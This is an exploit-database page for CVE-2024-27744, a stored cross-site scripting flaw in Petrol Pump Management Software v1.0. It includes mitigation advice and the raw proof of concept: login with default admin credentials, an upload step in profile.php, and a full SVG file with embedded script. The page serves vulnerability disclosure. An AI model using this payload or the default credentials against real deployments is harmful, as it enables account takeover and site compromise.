header-logo
Suggest Exploit
vendor:
Petrol Pump Management Software
by:
Shubham Pandey
4.1
CVSS
MEDIUM
Cross Site Scripting (XSS)
79
CWE
Product Name: Petrol Pump Management Software
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: CVE-2024-27744
CPE: a:petrol_pump_management_software:petrol_pump_management_software:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2024

Petrol Pump Management Software v.1.0 – Stored Cross Site Scripting via SVG file

An attacker can exploit a Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 by injecting malicious code through a crafted payload into the image parameter in the profile.php component. By uploading a specially crafted xss.svg file, the attacker can execute arbitrary code. The content of the xss.svg file includes a script that triggers an alert message.

Mitigation:

To mitigate this vulnerability, sanitize and validate user inputs to prevent the execution of arbitrary code. Additionally, restrict file upload types and sizes, and implement Content Security Policy (CSP) headers to mitigate XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file 
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27744
# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and
Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the xss.svg file in "Image" field
5. Stored XSS will be present in "
http://localhost/fuelflow/assets/images/xss.svg" page
6. The content of the xss.svg file is given below:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Shubham Pandey");
  </script>
</svg>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md

Navigation

Suggest Exploit

Services By CQR